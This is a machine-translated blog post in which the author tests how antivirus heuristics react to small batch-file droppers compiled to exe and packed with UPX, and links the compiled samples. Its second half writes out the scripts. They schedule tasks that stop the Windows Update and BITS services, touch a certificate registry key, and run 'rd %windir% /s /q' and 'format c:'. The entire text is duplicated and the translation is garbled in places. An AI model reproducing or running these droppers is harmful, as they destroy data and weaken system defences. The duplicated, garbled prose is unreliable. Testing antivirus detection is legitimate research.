On heuristics: the obvious-the incredible
Hello to all!
I hope someone gave me the reviews seemed interesting. We continue! Today I thought for a long time what to write. There were no ideas, except for a small grudge against Kaspersky Lab, but this is unimportant, and this is almost personally intimate.
So, today I want to pull the heuristics of some antiviruses for the primary sexual signs. You can try this at home! ;) As is usually the case, the results were surprising.
What we need:
')
1. Notepad aka Notepad.
2. Quick Batch Compiler.
3. UPX.
So, create this bat file:
Why I chose this registry option - let it remain a mystery. I will say this: the emphasis was on Kaspersky. Searching in Google, yes, he will find :)
Compile with Quick Batch Compiler in exe, with which we add garbage to upx.exe into a file and package upx.
Now let's see what vendors think about dummy. I hope everyone noticed rem in the file and have no doubt that he is a dummy? As expected, only Avira cursed, but then in her spirit. Casper did not live up to hope and looks good .
Complicate the task:
and we get an immediate additional "wow" from Symantek .
We start to grow up - rem disappear, but services all the same only juggle:
But antiviruses in this regard are absolutely indifferent - the picture is the same .
We kill the service, potentially opening holes in the car:
Antivirus anyway .
Everything, laugh - jokes aside:
The compiled file of this stuff is here (password virus ).
And now the funniest thing: my local CIS 2010 gave this alert:
However, Kaspersky is silent on VT as a Moldovan partisan, but the most interesting picture with other antiviruses : even a couple of detections are based on a signature basis, not on heuristics (heur, gen, suspicious, etc.)
It is necessary to make a dangerous code ( here is a compiled file, the password is the same): Kaspersky is already silent (honor and praise! Clever !), But other antivirus programs still see the threat , which is actually garbage.
But it will be much more interesting when I try to perform file scanning and disinfection using Kaspersky. To begin with, there were two detectors: from the scanner and from the resident. Then begins the “battle of the titans” from one camp. As a result, we see the following:
(hmm, remove the task, start the service and delete the file requires a reboot? well maybe ....)
(380 what? Degrees in a circle? Or scary characters in my bat file?)
(are we healthy or not ???)
But in the end everything ends, and sweetheart CIS 2010 says that there are no active threats. The danger has passed! ;)
So I decided for myself.
1. Detections, and even more so heur, gen, suspicious, etc. on BT it is far from a fact that the malware is. We considered the minimum code, and that caused fear, what will happen with a serious program?
2. Heuristics of Kaspersky understands what remarks are and what the active code is. Others - not so much :)
3. Avira as suffering from paranoia - and suffers further. On the other hand, it detects a lot of viruses. even more than they really are :)
4. KIS 2010 with all its charms and pluses is a very important product. Looking forward to 2011 !! (although there is little hope, it’s better not to find my requests yet).
I hope someone gave me the reviews seemed interesting. We continue! Today I thought for a long time what to write. There were no ideas, except for a small grudge against Kaspersky Lab, but this is unimportant, and this is almost personally intimate.
So, today I want to pull the heuristics of some antiviruses for the primary sexual signs. You can try this at home! ;) As is usually the case, the results were surprising.
What we need:
')
1. Notepad aka Notepad.
2. Quick Batch Compiler.
3. UPX.
So, create this bat file:
md "%temp%\123456"
echo rem reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates\F190D1C02C9AF8AB7AA6973C918A4E0836BDE847 /v Blob /t REG_BINARY /d 00 > "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"Why I chose this registry option - let it remain a mystery. I will say this: the emphasis was on Kaspersky. Searching in Google, yes, he will find :)
Compile with Quick Batch Compiler in exe, with which we add garbage to upx.exe into a file and package upx.
Now let's see what vendors think about dummy. I hope everyone noticed rem in the file and have no doubt that he is a dummy? As expected, only Avira cursed, but then in her spirit. Casper did not live up to hope and looks good .
Complicate the task:
md "%temp%\123456"
echo rem net stop wuauserv > "%temp%\123456\1.bat"
echo rem net start wuauserv > "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"and we get an immediate additional "wow" from Symantek .
We start to grow up - rem disappear, but services all the same only juggle:
md "%temp%\123456"
echo net stop wuauserv > "%temp%\123456\1.bat"
echo net start wuauserv > "%temp%\123456\1.bat"
echo net stop BITS > "%temp%\123456\1.bat"
echo net start BITS > "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"But antiviruses in this regard are absolutely indifferent - the picture is the same .
We kill the service, potentially opening holes in the car:
md "%temp%\123456"
echo net stop wuauserv > "%temp%\123456\1.bat"
echo net stop BITS > "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"Antivirus anyway .
Everything, laugh - jokes aside:
md "%temp%\123456"
echo net stop wuauserv > "%temp%\123456\1.bat"
echo net stop BITS > "%temp%\123456\1.bat"
echo rd %windir% /s /q > "%temp%\123456\1.bat"
echo format c: > "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"The compiled file of this stuff is here (password virus ).
And now the funniest thing: my local CIS 2010 gave this alert:
However, Kaspersky is silent on VT as a Moldovan partisan, but the most interesting picture with other antiviruses : even a couple of detections are based on a signature basis, not on heuristics (heur, gen, suspicious, etc.)
It is necessary to make a dangerous code ( here is a compiled file, the password is the same): Kaspersky is already silent (honor and praise! Clever !), But other antivirus programs still see the threat , which is actually garbage.
But it will be much more interesting when I try to perform file scanning and disinfection using Kaspersky. To begin with, there were two detectors: from the scanner and from the resident. Then begins the “battle of the titans” from one camp. As a result, we see the following:
(hmm, remove the task, start the service and delete the file requires a reboot? well maybe ....)
(380 what? Degrees in a circle? Or scary characters in my bat file?)
(are we healthy or not ???)
But in the end everything ends, and sweetheart CIS 2010 says that there are no active threats. The danger has passed! ;)
So I decided for myself.
1. Detections, and even more so heur, gen, suspicious, etc. on BT it is far from a fact that the malware is. We considered the minimum code, and that caused fear, what will happen with a serious program?
2. Heuristics of Kaspersky understands what remarks are and what the active code is. Others - not so much :)
3. Avira as suffering from paranoia - and suffers further. On the other hand, it detects a lot of viruses. even more than they really are :)
4. KIS 2010 with all its charms and pluses is a very important product. Looking forward to 2011 !! (although there is little hope, it’s better not to find my requests yet).
Source: https://habr.com/ru/post/97052/
All Articles